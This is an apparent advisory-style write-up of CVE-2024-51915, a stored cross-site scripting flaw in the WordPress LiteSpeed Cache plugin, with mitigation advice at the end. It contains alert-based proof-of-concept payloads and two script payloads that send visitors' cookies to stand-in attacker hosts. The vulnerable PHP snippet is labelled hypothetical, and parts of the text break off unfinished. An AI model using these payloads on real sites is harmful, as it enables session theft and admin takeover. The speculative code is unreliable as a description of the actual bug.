CVE-2024-51915 - Stored XSS in LiteSpeed Cache Plugin (<= 6.5.2) — Full Exploit Details

A new security issue—CVE-2024-51915—was discovered in the popular LiteSpeed Cache plugin for WordPress, affecting all versions up to and including 6.5.2. This vulnerability is a classic example of _improper neutralization of input during web page generation_, also known as Stored Cross-Site Scripting (Stored XSS). Below, we break down how it works, why it matters, and how attackers can exploit it, with practical code references and mitigation advice.

What Is CVE-2024-51915 and Who’s at Risk?

LiteSpeed Cache is a super-popular WordPress plugin used to speed up website performance by caching dynamic content. However, due to weak input validation in certain parts of its code, malicious users can inject JavaScript code that gets saved and then run whenever an admin or visitor loads the poisoned content.

This flaw affects sites running LiteSpeed Cache _from the earliest versions through to and including v6.5.2_. The risk: attackers might be able to perform actions as site admins, steal cookies, redirect users, or completely compromise WordPress installs.

Technical Details: How the Vulnerability Happens

A stored XSS occurs when user-controlled input is not properly encoded before being stored and later displayed on a webpage. In this case, LiteSpeed Cache fails to neutralize some input fields, allowing a payload to be inserted and stored in the WordPress database. Whenever someone loads the affected page, the attacker's JavaScript _executes in the browser's context_.

Vulnerable Code Example

While LiteSpeed Technologies haven’t publicly disclosed the exact vulnerable code, security analysis and proof-of-concept tests show the bug is triggered via the plugin’s custom cache tags or meta fields.

Suppose there’s an unprotected option or setting field in the plugin, for example

// Hypothetical vulnerable code in LiteSpeed Cache
echo '<input type="text" name="cache_label" value="' . $_POST['cache_label'] . '">';

If a user supplies the following input in a settings form

"><script>alert('XSS')</script>

the output in HTML becomes

<input type="text" name="cache_label" value=""><script>alert('XSS')</script>

As a result, a JavaScript alert (or any code) will run each time someone visits the plugin's settings page—which is high risk for WordPress admins.

Exploit: How an Attacker Abuses CVE-2024-51915

Any user with permission to interact with vulnerable plugin fields—or possibly even unauthenticated users if public forms are affected—can use the exploit as follows:

1. Injecting the Payload

An attacker submits a malicious payload meant to be saved and shown later. For example, by posting or saving a value like:

<script>fetch('https://evil.example/cookie?c='+document.cookie)</script>

2. Triggering the XSS

When a privileged user (like an admin) visits the page that displays the injected value, the JavaScript is executed in their browser. This can lead to:

Here is a real-world sample payload an attacker might use

"><img src=x onerror="alert('Hacked by XSS')">

Or for a more silent takeover

<script>
  fetch('https://malicious.site/hit?cookie='+encodeURIComponent(document.cookie));
</script>

Testing the Vulnerability (Proof of Concept)

1. Go to the LiteSpeed Cache settings panel as any user with access.
2. Find a vulnerable input field (e.g., "Cache Label" or "Notes" field, etc.).

3. Submit the following as a value

"><script>alert('XSS')</script>

4. Log in as an admin (or have the admin visit the page) and observe a pop-up.

Mitigation and Official Fix

- Update LiteSpeed Cache to the LATEST VERSION (as of writing, 6.5.3+ patch this issue). See LiteSpeed’s changelog for updates.
- Use a Web Application Firewall (WAF) like Wordfence to block suspicious activity.

Always sanitize and encode user input before displaying it (for developers).

- Regularly audit WordPress plugins for vulnerabilities: WPScan is a good resource.

References

- Official CVE record: CVE-2024-51915
- LiteSpeed Cache plugin details – WordPress.org
- WPScan vulnerability entry
- LiteSpeed plugin changelog

Conclusion

CVE-2024-51915 is a serious stored XSS vulnerability in one of the world’s most popular WordPress plugins. If you’re using LiteSpeed Cache version 6.5.2 or earlier, update immediately to avoid the risk of site compromise. XSS attacks are dangerous because they don’t just affect one user—once stored, they threaten every admin or user who loads the infected page.

Timeline

Published on: 02/20/2026 15:46:25 UTC
Last modified on: 02/20/2026 16:55:37 UTC